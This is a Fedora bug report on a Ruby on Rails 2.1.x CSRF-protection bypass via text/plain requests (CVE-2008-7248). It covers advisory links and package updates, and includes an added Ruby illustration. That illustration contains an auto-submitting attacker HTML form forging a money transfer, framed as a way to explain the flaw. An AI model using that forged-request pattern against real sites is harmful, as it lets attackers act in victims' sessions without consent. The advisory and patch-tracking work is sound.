A way to circumvent the protection against cross-site request forgery (CSRF) attacks was found in Ruby on Rails. Quoting the upstream security advisory for exact details: There is a bug in all 2.1.x versions of Ruby on Rails which affects the effectiveness of the CSRF protection given by protect_from_forgery. By design Rails does not perform token verification on requests with certain content types not typically generated by browsers. Unfortunately this list also included 'text/plain', which can be generated by browsers. Requests can be crafted which will circumvent the CSRF protection entirely. Rails does not parse the parameters provided with these requests, but that may not be enough to protect your application.

References:
http://www.rorsecurity.info/journal/2008/11/19/circumvent-rails-csrf-protection.html
http://weblog.rubyonrails.org/2008/11/18/potential-circumvention-of-csrf-protection-in-rails-2-1

Upstream patch:
http://github.com/rails/rails/commit/099a98e9b7108dae3e0f78b207e0a7dc5913bd1a

CVE Request:
http://www.openwall.com/lists/oss-security/2009/11/28/1
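The following is an added example, not code from Rails or from this bug report. It models the 2.1.x decision the advisory describes ("skip the authenticity-token check for content types browsers do not generate") and shows why a browser-submitted form with enctype="text/plain" bypasses it, plus what an application that reads request.raw_post itself would still receive. The Request struct, the method names, the attacker form, the session token and the exact contents of the exemption lists (beyond text/plain, which the advisory confirms) are assumptions made for illustration; the real logic lived in ActionController's request forgery protection and Mime::Type.

```ruby
require 'set'

# Constructed stand-in for a Rails request (not ActionController::Request).
Request = Struct.new(:http_method, :content_type, :params, :raw_post,
                     :session_token)

# Illustrative stand-in for the 2.1.x "unverifiable" content-type list.
# text/plain being on it is what the advisory reports; the other entries are
# assumptions representing non-browser API formats.
VULNERABLE_EXEMPT = Set.new(%w[text/plain application/xml application/json])

# What the upstream fix amounts to: browsers can send text/plain, so it must
# not be exempt from the token check.
FIXED_EXEMPT = VULNERABLE_EXEMPT - %w[text/plain]

# Simplified verification decision. Returns true when the request may proceed.
def verified?(req, exempt_types)
  # Token verification only applies to state-changing (non-GET) requests.
  return true if req.http_method == 'GET'
  # The exemption: requests in these content types skip the check entirely.
  return true if exempt_types.include?(req.content_type)
  !req.session_token.nil? &&
    req.params['authenticity_token'] == req.session_token
end

def accepted_by_vulnerable?(req)
  verified?(req, VULNERABLE_EXEMPT)
end

def accepted_by_fixed?(req)
  verified?(req, FIXED_EXEMPT)
end

# Constructed attacker page. A logged-in victim whose browser loads it sends a
# cross-site POST carrying the victim's cookies, Content-Type: text/plain and
# no authenticity token.
ATTACKER_FORM = <<~HTML
  <form id="f" method="post" enctype="text/plain"
        action="http://victim.example/transfers">
    <input type="hidden" name="amount" value="1000">
    <input type="hidden" name="to" value="attacker">
  </form>
  <script>document.getElementById("f").submit();</script>
HTML

# Body a browser produces for enctype="text/plain": one "name=value" pair per
# line, CRLF-terminated.
def text_plain_body(fields)
  fields.map { |k, v| "#{k}=#{v}\r\n" }.join
end

# What an application that bypasses Rails' parameter parsing and reads the raw
# body itself would recover. This is the "may not be enough" caveat: Rails not
# parsing the params does not stop the app from acting on them.
def parse_text_plain(raw)
  raw.split("\r\n").each_with_object({}) do |line, fields|
    name, value = line.split('=', 2)
    fields[name] = value
  end
end

SESSION_TOKEN = 'session-secret-token' # assumed per-session token

# Cross-site request: text/plain, empty params (Rails does not parse them),
# no token anywhere.
FORGED_REQUEST = Request.new(
  'POST', 'text/plain', {},
  text_plain_body('amount' => '1000', 'to' => 'attacker'),
  SESSION_TOKEN
)

# Same-site form submission that carries the token Rails embedded in the page.
LEGIT_REQUEST = Request.new(
  'POST', 'application/x-www-form-urlencoded',
  { 'amount' => '10', 'to' => 'friend', 'authenticity_token' => SESSION_TOKEN },
  'amount=10&to=friend&authenticity_token=session-secret-token',
  SESSION_TOKEN
)

if __FILE__ == $PROGRAM_NAME
  puts "forged, vulnerable check: #{accepted_by_vulnerable?(FORGED_REQUEST)}"
  puts "forged, fixed check:      #{accepted_by_fixed?(FORGED_REQUEST)}"
  puts "legit, fixed check:       #{accepted_by_fixed?(LEGIT_REQUEST)}"
  puts "raw body as the app might parse it: #{parse_text_plain(FORGED_REQUEST.raw_post)}"
end
```

The vulnerable check accepts the forged request purely on its content type; the fixed list makes it fall through to the token comparison, which fails because no token is present, while the legitimate submission still passes under both. The parse_text_plain output shows that an application reading the raw body is affected even though Rails itself never populated params from it.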
This issue affects the versions of the rubygem-actionpack package as shipped with Fedora releases 10, 11 and 12. This issue affects the version of the rubygem-actionpack package as shipped with the Extra Packages for Enterprise Linux 5 (EPEL-5) project. Please fix.
For F-13/12/11 (i.e. for rubygem-actionpack 2.3.x) this is NOTABUG because the usage of unverifiable_types is deprecated (and not used):
https://rails.lighthouseapp.com/projects/8994/tickets/1145-bug-invalidauthenticitytoken-incorrectly-raised-for-xml-controllerdestroy-request
git commit: http://github.com/rails/rails/commit/f1ad8b48aae3ee26613b3e77bc0056e120096846

Only affects F-10 and EL-5, if any.
rubygem-actionpack-2.1.1-5.fc10 has been submitted as an update for Fedora 10. http://admin.fedoraproject.org/updates/rubygem-actionpack-2.1.1-5.fc10
rubygem-actionpack-2.1.1-5.el5 has been submitted as an update for Fedora EPEL 5. http://admin.fedoraproject.org/updates/rubygem-actionpack-2.1.1-5.el5
rubygem-actionpack-2.1.1-5.el5 has been pushed to the Fedora EPEL 5 stable repository. If problems still persist, please make note of it in this bug report.
rubygem-actionpack-2.1.1-5.fc10 has been pushed to the Fedora 10 stable repository. If problems still persist, please make note of it in this bug report.
This is CVE-2008-7248.
I think this can be closed.